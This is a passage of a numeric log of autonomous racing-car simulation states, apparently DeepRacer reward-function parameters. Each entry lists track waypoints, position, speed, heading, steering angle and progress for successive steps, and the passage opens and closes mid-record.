(2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1422415816125593, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9542983635625084, 'all_wheels_on_track': True, 'distance_from_center': 0.0037763696438425478, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096249101529135, 'object_in_camera': False, 'heading': -1.144017253009116, 'objects_speed': [], 'progress': 0.8651111558456122, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 4.0},
{'is_left_of_center': False, 'projection_distance': 0.20191403063825683, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.175030705920951, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9531424221266476, 'all_wheels_on_track': True, 'distance_from_center': 0.004816122658064441, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096159441726402, 'object_in_camera': False, 'heading': -1.274013521940257, 'objects_speed': [], 'progress': 1.0328188973338295, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 5.0},
{'is_left_of_center': False, 'projection_distance': 0.23782031815517216, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2109317593475533, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9509277885376232, 'all_wheels_on_track': True, 'distance_from_center': 0.006944210021401, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096061250441126, 'object_in_camera': False, 'heading': -1.6277243413174938, 'objects_speed': [], 'progress': 1.216484649353865, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 6.0},
{'is_left_of_center': False, 'projection_distance': 0.3043395330840337, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2774576092278784, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.953600119077487, 'all_wheels_on_track': True, 'distance_from_center': 0.00411152612414604, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095879343380803, 'object_in_camera': False, 'heading': -0.5769436778572566, 'objects_speed': [], 'progress': 1.5567398658792773, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 7.0},
{'is_left_of_center': True, 'projection_distance': 0.38718280457705984, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.360318239199224, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9607014197320498, 'all_wheels_on_track': True, 'distance_from_center': 0.003189490145353297, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096016069343125, 'object_in_camera': False, 'heading': 1.1534265481188193, 'objects_speed': [], 'progress': 1.9804949464177108, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 8.0},
{'is_left_of_center': True, 'projection_distance': 0.4613673129751599, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.434513541710265, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9682327913973465, 'all_wheels_on_track': True, 'distance_from_center': 0.010850693277073015, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095861829769621, 'object_in_camera': False, 'heading': 2.4432909721626266, 'objects_speed': [], 'progress': 2.359959225946886, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 9.0},
{'is_left_of_center': True, 'projection_distance': 0.5398379830761915, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.5129910650101888, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.97216416392405, 'all_wheels_on_track': True, 'distance_from_center': 0.014916561834819316, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096006411095111, 'object_in_camera': False, 'heading': 2.5651683948298047, 'objects_speed': [], 'progress': 2.761347830347507, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 10.0},
{'is_left_of_center': True, 'projection_distance': 0.6396956392339029, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 